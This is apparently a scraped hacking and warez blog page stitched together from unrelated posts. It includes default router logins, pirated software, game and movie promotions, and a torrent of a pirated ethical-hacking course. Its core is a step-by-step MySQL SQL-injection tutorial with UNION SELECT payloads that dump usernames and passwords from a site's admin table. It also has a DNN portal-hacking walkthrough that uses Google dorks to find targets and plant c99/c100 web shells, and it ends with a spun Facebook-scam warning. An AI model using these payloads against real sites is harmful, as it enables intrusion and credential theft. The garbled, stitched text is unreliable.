First connect to your broadband, and goto http://whatismyip.com to know your public IP Address.
ID : admin / Pass : admin123
ID : admin / Pass : admin321
ID : root / Pass : root
Today i want to share a great antivirus . Kaspersky Pure gives you much more than just antivirus software.ItÃ¢€™s everything you need to protect all the most important assets in your digitallife: your computer, your online accounts, your most valuable dataÃ¢€¦ even yourfamily.
Sniper Elite V2-SKIDROW| Publisher: 505 Games | Developer: Rebellion | Genre: First-Person Action | Platform: PC | Size: 5.1 GB
From the Golden Gate to the Empire State — Compete in The Run, an illicit race across the most iconic and treacherous roads from San Francisco to New York. There are no rules and no allies in the cities, deserts, mountains and canyons than stand between you and the finish line.
Today i want to share a nice romantic Hindi movie that name is Murder 2, so no more late quickly download this movie and enjoy
TeamViewer Manager is an optional database tool that stores your partner details in a database that can also be shared over the network with other supporters. Also includes sophisticated logging and reporting functionality for your connections. TeamViewer Manager is only included in the Premium licenses or higher. Without a license, this download is restricted to a total of five partners and may be used for trial purposes.
This contains the complete package to the Certified Ethical Hacker course, version 7 (the most recent at the time of this upload). It contains the lectures (as videos), the study guide, unencrypted copies of the teacher's instructor slides, and all the programs you'll need in the course. Note that the programs are put in ISO images. To open the ISOs, you can either burn them to a disk and open them like any other data-containing disk, or you can open them with software such as 7-zip (which is what I prefer, because after all ISOs are only containers). Along with the tools are animations that explain how to use them (and how to install them). Also, just because this focuses on "ethical hacking" (or authorized hacking as I prefer to call it) doesn't mean it doesn't teach you black hat methods.
The official Certified Ethical Hacker course costs something like $500, and you can only take the exam once. If you fail, you have to pay another $500 to retake it. That's what this torrent is for, studying. And its not just studying for the CEH exam, its also simply a great way to learn hacking. Note that this course assumes you have moderate understanding of computers, a computer with Windows (the course is oriented around Windows, but if you have Linux then many of the Windows tools can be run through Wine), and plenty of time on your hands. You do not need to be a Linux guru or have programming knowledge to learn from this course.
The course is broken up into different sections, called "modules", each teaching a slightly different subject. The modules are:
-Module 02: Footprinting and Reconnaissance
-Module 03: Scanning Networks
-Module 04: Enumeration
-Module 05: System Hacking
-Module 06: Trojans and Backdoors
-Module 07: Viruses and Worms
-Module 08: Sniffers
-Module 09: Social Engineering
-Module 10: Denial of Service
-Module 11: Session Hijacking
-Module 12: Hacking Webserver
-Module 13: Hacking Web Applications
-Module 14: SQL Injection
-Module 15: Hacking Wireless Networks
-Module 16: Evading IDS, Firewalls, and Honeypots
-Module 17: Buffer Overflows
-Module 18: Cryptography
-Module 19: Penetration Testing
I originally found this torrent on TPB, but it was so tremendously helpful I decided to upload it elsewhere. Enjoy this torrent, remember to seed, and get hacking!
|Click to see files:|
thanks a trillion frnd...
SQL Injection in MySQL Databases:-
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.
When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:
If the database is vulnerable, the page will spit out a MySQL error such as;
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29
If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.
Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:
If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.
We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
www.site.com/page=1 union all select 1,2,3,4--
This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.
We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
or if these dont work try...
For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--
The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.
In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.
In this Step we want to list all the column names in the database, to do this we use the following command:
union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.
Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--
Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website
Portal Hacking (DNN) Technique:-
One more hacking method called "Portal Hacking (DNN)". This method also uses in google search engine to find hackable sites.. Here U can use only Google Dorks for
hacking a websites..
Here U can use dez two Google Dorks
You can also modify this google dork according to your need & requirement
Here is the exploit
Step 1 :
Now enter this dork
this is a dork to find the Portal Vulnerable sites, use it wisely.
you will find many sites, Select the site which you are comfortable with.
For example take this site.
Step 5: Now replace
Step 6: You will get a Link Gallary page.So far so good!
Step 7: Dont do anything for now,wait for the next step...
Step 8: Now replace the URL in the address bar with a Simple Script
Step 9: You will Find the Upload Option
Upload your package Your Shell c99,c100 , Images, etc
After running this JAVA script, you will see the option for Upload Selected File Now select you page file which you have & upload here.
Now Go to main page and refresh. you have seen hacked the website.
▶Like Scams: where you “like” the web page only to find nothing existing on it. Scammers advantage from guests.
▶Survey Scams: you finish online internet surveys and fraudsters again advantage.
▶Fake Applications Scam: allow legal programs to pick up your private details.
New scammers area almost daily and sweep across a huge variety of details on Facebook or myspace or fb.
Here are 3 most well-known scammers you should beware:
Here, the fraudsters set up a web page guaranteeing a interest looking for story, like “LOL This woman gets OWNED after a POLICE OFFICER moves her STATUS MESSAGE.” Then they strategy a huge variety of clients and their friends into “liking” the web page, which really has nothing. Scammers advantage from the guests .
Similar to like scams, a super-juicy review is assured like “OMG! Look what this kid did to his university after being expelled!”. You have to “like” the web page and finish a fast research before learning the story. Know what! You just offered fraudsters a commission transaction payment for posting the research, and served the scams distribute by posting it to all your friends.
3>Fake Applications Scam:
Some third-party legal programs pick up your details when you allow them to accessibility your details. Some other individuals like “Want to see who regarded your profile?” scams you through online internet surveys. One can never really know who regarded your profile! But that has not stopped fraudsters from creating fake programs that make believe that to let you see that is confirming you out on Facebook or myspace or fb. Instead, the programs just provide you to a research, and immediately development a weblink to all your friends. Scammers advantage again.
So next time you see such things on Facebook or myspace or fb, do not ever simply select them!Blogger Labels: frauds,Facebook,BRIEF,Scams,Scammers,advantage,guests,Survey,fraudsters,Fake,Applications,Scam,area,Here,woman,POLICE,OFFICER,STATUS,MESSAGE,strategy,clients,Similar,Look,transaction,payment,Some,individuals,Want,Instead,development,myspace,internet